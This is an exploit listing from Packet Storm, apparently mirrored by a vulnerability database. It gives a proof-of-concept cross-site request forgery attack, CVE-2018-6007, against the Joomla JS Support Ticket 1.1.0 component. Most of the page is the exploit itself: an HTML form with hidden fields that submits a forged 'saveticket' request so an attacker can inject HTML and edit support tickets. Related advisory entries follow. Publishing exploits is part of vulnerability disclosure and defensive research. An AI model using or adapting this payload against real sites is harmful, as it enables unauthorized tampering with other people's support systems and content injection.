Lucene search
Ihsan SencanPACKETSTORM:146135HistoryJan 28, 2018 - 12:00 a.m.
Joomla! JS Support Ticket 1.1.0 Cross Site Request Forgery
2018-01-2800:00:00
Ihsan Sencan
packetstormsecurity.com
37
0.002 Low
EPSS
Percentile
51.9%
`<!--
# # # # #
# Exploit Title: Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/js-support-ticket/
# Software Download: http://joomsky.com/46/download/1.html
# Version: 1.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6007
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability implication allows an attacker to inject html code, edit ticket etc..
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://localhost/[PATH]/index.php" method="POST" enctype="multipart/form-data" name="adminForm" id="adminForm">
<textarea name="message" id="message" cols="60" rows="20" style="width: 550px; height: 300px;">
<p>[CODE]</p>
</textarea><br>
<input type="submit" class="button" name="submit_app" id="submit_app_button" onclick="return validate_form(document.adminForm)" value="Ver Ayari">
<input type="hidden" name="id" id="id" value="1" />
<input type="hidden" name="isoverdue" id="isoverdue" value="0" />
<input type="hidden" name="ticketid" id="ticketid" value="vCP4VTWrwzY" />
<input type="hidden" name="c" id="c" value="ticket" />
<input type="hidden" name="task" id="task" value="saveticket" />
<input type="hidden" name="uid" id="uid" value="521" />
<input type="hidden" name="view" id="view" value="ticket" />
<input type="hidden" name="layout" id="layout" value="formticket" />
<input type="hidden" name="check" id="check" value="" />
<input type="hidden" name="option" id="option" value="com_jssupportticket" />
<input type="hidden" name="created" id="created" value="2018-01-27 11:46:58"/>
<input type="hidden" name="update" id="update" value=""/>
</form>
</body>
</html>
`
Related
cvelist
cvelist
CVE-2018-6007
2018-01-29 05:00:00
cve
cve
CVE-2018-6007
2018-01-29 05:29:00
checkpoint_advisories
checkpoint_advisories
Joomla com_jssupportticket Component Cross-Site Scripting (CVE-2018-6007)
2018-02-27 00:00:00
nvd
nvd
CVE-2018-6007
2018-01-29 05:29:00
exploitpack
exploitpack
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
2018-01-28 00:00:00
zdt
zdt
prion
prion
Cross site request forgery (csrf)
2018-01-29 05:29:00
exploitdb
exploitdb
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
2018-01-28 00:00:00